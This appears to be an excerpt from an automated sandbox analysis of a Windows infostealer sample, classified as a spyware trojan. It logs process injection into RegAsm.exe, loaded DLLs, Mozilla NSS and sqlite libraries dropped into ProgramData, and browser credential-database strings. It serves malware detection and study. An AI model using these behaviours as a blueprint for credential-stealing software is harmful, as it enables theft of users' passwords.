Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CE5CDC0	4_2_6CE5CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD66D90	4_2_6CD66D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CCD4DB0	4_2_6CCD4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CDFAD50	4_2_6CDFAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD9ED70	4_2_6CD9ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CE58D20	4_2_6CE58D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CCDAEC0	4_2_6CCDAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD70EC0	4_2_6CD70EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD56E90	4_2_6CD56E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD6EE70	4_2_6CD6EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CDB0E20	4_2_6CDB0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CDAEFF0	4_2_6CDAEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CCD0FE0	4_2_6CCD0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CE18FB0	4_2_6CE18FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CCDEFB0	4_2_6CCDEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD3EF40	4_2_6CD3EF40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CE509D0 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CC094D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004164BE appears 97 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00401FE7 appears 286 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6CBFCBE8 appears 134 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 848

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000001.00000000.2046375374.0000000000EB6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
Source: file.exe, 00000001.00000002.2120410820.000000000155E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000001.00000002.2120772678.0000000003313000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/31@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_6CC27030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

4_2_6CC27030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040F039 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_0040F039

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040F43A CoCreateInstance,SysAllocString,SysFreeString,_wtoi64,SysFreeString,SysFreeString,

4_2_0040F43A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199658817715[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2016

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a42312b4-3bf3-478d-a673-2c1c00308fce

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr, nss3[1].dll.4.dr, nss3.dll.4.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr, nss3[1].dll.4.dr, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr, nss3[1].dll.4.dr, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr, nss3[1].dll.4.dr, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr, nss3[1].dll.4.dr, nss3.dll.4.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr, nss3[1].dll.4.dr, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: ECAEGHIJEHJDHIDHIDAE.4.dr, IJEHIDHDAKJDHJKEBFIE.4.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.4.dr, softokn3.dll.4.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 848
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
Source:	Binary string: System.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: Friendly.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: c:\lb9ddh54ecqka\obj\Release\Friendly.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140.dll.4.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: System.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: System.Core.ni.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: Friendly.pdb4 source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
Source:	Binary string: mscorlib.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: System.Core.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
Source:	Binary string: System.ni.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: mscorlib.pdbH source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3DCE.tmp.dmp.8.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00415745 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00415745

Source: sqlm[1].dll.4.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.4.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.4.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.4.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.4.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.4.dr	Static PE information: section name: .didat
Source: nss3.dll.4.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.4.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.4.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.4.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004175D5 push ecx; ret		4_2_004175E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBFB536 push ecx; ret		4_2_6CBFB549

Source: file.exe

Static PE information: section name: .text entropy: 7.973456730840853

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

4_2_00415745

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
